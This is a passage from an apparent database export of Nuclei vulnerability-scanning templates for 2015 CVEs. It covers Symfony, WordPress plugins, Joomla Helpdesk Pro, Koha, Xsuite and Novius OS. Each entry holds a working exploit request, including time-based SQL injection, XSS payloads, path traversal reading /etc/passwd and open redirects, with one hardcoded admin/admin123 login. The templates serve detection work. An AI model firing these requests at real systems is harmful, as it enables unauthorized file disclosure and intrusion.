matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n# digest: 4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950", "hash": "d0c8182e4521dbb344f10e41af46391d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f52" }, "name": "CVE-2015-4050.yaml", "content": "id: CVE-2015-4050\n\ninfo:\n name: Symfony - Authentication Bypass\n author: ELSFA7110,meme-lord\n severity: medium\n description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Symfony.\n reference:\n - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access\n - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access\n - http://www.debian.org/security/2015/dsa-3276\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4050\n - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-4050\n cwe-id: CWE-284\n epss-score: 0.00598\n epss-percentile: 0.77957\n cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sensiolabs\n product: symfony\n tags: cve2015,cve,symfony,rce,sensiolabs\n\nhttp:\n - 
method: GET\n path:\n - \"{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Credits\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950", "hash": "804950053eedefd2ca16c90fad51bf21", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f53" }, "name": "CVE-2015-4062.yaml", "content": "id: CVE-2015-4062\n\ninfo:\n name: WordPress NewStatPress 0.9.8 - SQL Injection\n author: r3Y3r53\n severity: medium\n description: |\n WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Update to plugin version 0.9.9 or latest.\n reference:\n - https://packetstormsecurity.com/files/132038/\n - https://wordpress.org/plugins/newstatpress\n - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4062\n - https://wordpress.org/plugins/newstatpress/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P\n cvss-score: 6.5\n cve-id: CVE-2015-4062\n cwe-id: CWE-89\n epss-score: 0.03919\n epss-percentile: 0.91099\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: 
cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body_2, \"newstatpress_page_nsp_search\")'\n condition: and\n# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950", "hash": "cc5d553f1a98f57d2c6bd373acbfce30", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f54" }, "name": "CVE-2015-4063.yaml", "content": "id: CVE-2015-4063\n\ninfo:\n name: NewStatPress <0.9.9 - Cross-Site Scripting\n author: r3Y3r53\n severity: low\n description: |\n WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. 
The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Update to plugin version 0.9.9 or latest.\n reference:\n - https://packetstormsecurity.com/files/132038/\n - https://wordpress.org/plugins/newstatpress/\n - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4063\n - https://wordpress.org/plugins/newstatpress/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N\n cvss-score: 3.5\n cve-id: CVE-2015-4063\n cwe-id: CWE-79\n epss-score: 0.04016\n epss-percentile: 0.91867\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log=admin&pwd=admin123&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?where1=&searchsubmit=Buscar&page=nsp_search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - \"contains(body_2, '') && contains(body_2, 'newstatpress')\"\n condition: and\n# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950", "hash": "aea9464ab25fa00cb83f5c9fab55a278", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f55" }, "name": 
"CVE-2015-4074.yaml", "content": "id: CVE-2015-4074\n\ninfo:\n name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html\n - https://www.exploit-db.com/exploits/37666/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4074\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-4074\n cwe-id: CWE-22\n epss-score: 0.00598\n epss-percentile: 0.77961\n cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: helpdesk_pro_project\n product: helpdesk_pro\n framework: joomla\\!\n tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\\!,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950", "hash": "a149c4f9a58229403330350c26af7803", "level": 5, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f56" }, "name": "CVE-2015-4127.yaml", "content": "id: CVE-2015-4127\n\ninfo:\n name: WordPress Church Admin <0.810 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37112\n - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408\n - https://wordpress.org/plugins/church-admin/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4127\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-4127\n cwe-id: CWE-79\n epss-score: 0.0034\n epss-percentile: 0.68397\n cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: church_admin_project\n product: church_admin\n framework: wordpress\n tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Church Admin ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950", "hash": "887fb05dafe86d4a4435f5ef9fcefe13", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f57" }, "name": "CVE-2015-4414.yaml", "content": "id: CVE-2015-4414\n\ninfo:\n name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal\n author: daffainfo\n severity: medium\n description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37274\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4414\n - https://www.exploit-db.com/exploits/37274/\n - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html\n - https://wpvulndb.com/vulnerabilities/8032\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-4414\n cwe-id: CWE-22\n epss-score: 0.12486\n epss-percentile: 0.95299\n cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: se_html5_album_audio_player_project\n product: se_html5_album_audio_player\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/se-html5-album-audio-player\"\n tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project\n\nhttp:\n - method: 
GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a1e96510bf46f0ef10d550a44e8008d7c94bdc586bca89d6326af5877a9aa00e0221009f73f1b77fe426015fe533efc27ee70158689c68e345cbcf26c1e772fdd9d695:922c64590222798bb761d5b6d8e72950", "hash": "050dfcd50a18145e354e8f2588355514", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f58" }, "name": "CVE-2015-4632.yaml", "content": "id: CVE-2015-4632\n\ninfo:\n name: Koha 3.20.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.\n impact: |\n An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37388\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4632\n - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/\n - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n - https://koha-community.org/koha-3-14-16-released/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-4632\n cwe-id: CWE-22\n epss-score: 0.02297\n epss-percentile: 0.88584\n cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n 
vendor: koha\n product: koha\n tags: cve2015,cve,lfi,edb,koha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950", "hash": "436d35fb15cd6f632f858d46cc91659c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f59" }, "name": "CVE-2015-4666.yaml", "content": "id: CVE-2015-4666\n\ninfo:\n name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution.\n remediation: |\n Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt\n - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4666\n - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html\n - https://www.exploit-db.com/exploits/37708/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-4666\n cwe-id: CWE-22\n epss-score: 0.02372\n epss-percentile: 0.89592\n 
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xceedium\n product: xsuite\n tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950", "hash": "21824a4e3e3bef68e825c68cdc2f227e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5a" }, "name": "CVE-2015-4668.yaml", "content": "id: CVE-2015-4668\n\ninfo:\n name: Xsuite <=2.4.4.5 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability.\n reference:\n - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt\n - https://vuldb.com/?id.107082\n - https://www.exploit-db.com/exploits/37708/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4668\n - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-4668\n cwe-id: CWE-601\n epss-score: 0.00397\n epss-percentile: 0.73024\n cpe: 
cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xceedium\n product: xsuite\n tags: cve2015,cve,redirect,xsuite,xceedium,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950", "hash": "fcbd28d15e39375190b752deb46cc73a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5b" }, "name": "CVE-2015-4694.yaml", "content": "id: CVE-2015-4694\n\ninfo:\n name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.\n impact: |\n Arbitrary file retrieval\n remediation: |\n Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.\n reference:\n - https://wordpress.org/plugins/zip-attachments/#developers\n - https://wpscan.com/vulnerability/8047\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4694\n - http://www.vapid.dhs.org/advisory.php?v=126\n - https://wordpress.org/plugins/zip-attachments/changelog/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2015-4694\n cwe-id: CWE-22\n epss-score: 0.02304\n epss-percentile: 0.88593\n cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zip_attachments_project\n product: zip_attachments\n framework: wordpress\n google-query: 
inurl:\"/wp-content/plugins/zip-attachments\"\n tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950", "hash": "c25ce8e487ab715ab07fd4b03b68ca43", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5c" }, "name": "CVE-2015-5354.yaml", "content": "id: CVE-2015-5354\n\ninfo:\n name: Novius OS 5.0.1-elche - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Novius OS.\n reference:\n - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html\n - https://vuldb.com/?id.76181\n - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5354\n - https://www.exploit-db.com/exploits/37439/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2015-5354\n cwe-id: CWE-601\n epss-score: 0.00166\n epss-percentile: 0.53247\n cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: novius-os\n product: novius_os\n tags: 
cve2015,cve,packetstorm,redirect,novius,novius-os,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950", "hash": "b66b14e6b1d58a926afd9990fc3419ff", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5d" }, "name": "CVE-2015-5461.yaml", "content": "id: CVE-2015-5461\n\ninfo:\n name: WordPress StageShow <5.0.9 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. 
A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks.\n remediation: |\n Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16\n - https://wordpress.org/plugins/stageshow/changelog/\n - http://seclists.org/fulldisclosure/2015/Jul/27\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5461\n - https://plugins.trac.wordpress.org/changeset/1165310/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2015-5461\n cwe-id: NVD-CWE-Other\n epss-score: 0.0055\n epss-percentile: 0.77025\n cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: stageshow_project\n product: stageshow\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/stageshow/\"\n tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950", "hash": "c527fd250c88cafa3fbe86511b687424", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5e" }, "name": "CVE-2015-5469.yaml", "content": "id: CVE-2015-5469\n\ninfo:\n name: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: WordPress 
MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation.\n remediation: |\n Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.\n reference:\n - https://www.openwall.com/lists/oss-security/2015/07/10/5\n - http://www.vapid.dhs.org/advisory.php?v=133\n - http://www.openwall.com/lists/oss-security/2015/07/10/5\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5469\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-5469\n cwe-id: CWE-22\n epss-score: 0.02176\n epss-percentile: 0.88248\n cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mdc_youtube_downloader_project\n product: mdc_youtube_downloader\n framework: wordpress\n tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950", "hash": "8c47d7c3ba6566c877bffc7b918e76bf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5f" }, "name": "CVE-2015-5471.yaml", "content": "id: CVE-2015-5471\n\ninfo:\n name: Swim Team <= v1.44.10777 - Local File Inclusion\n author: 0x_Akoko\n 
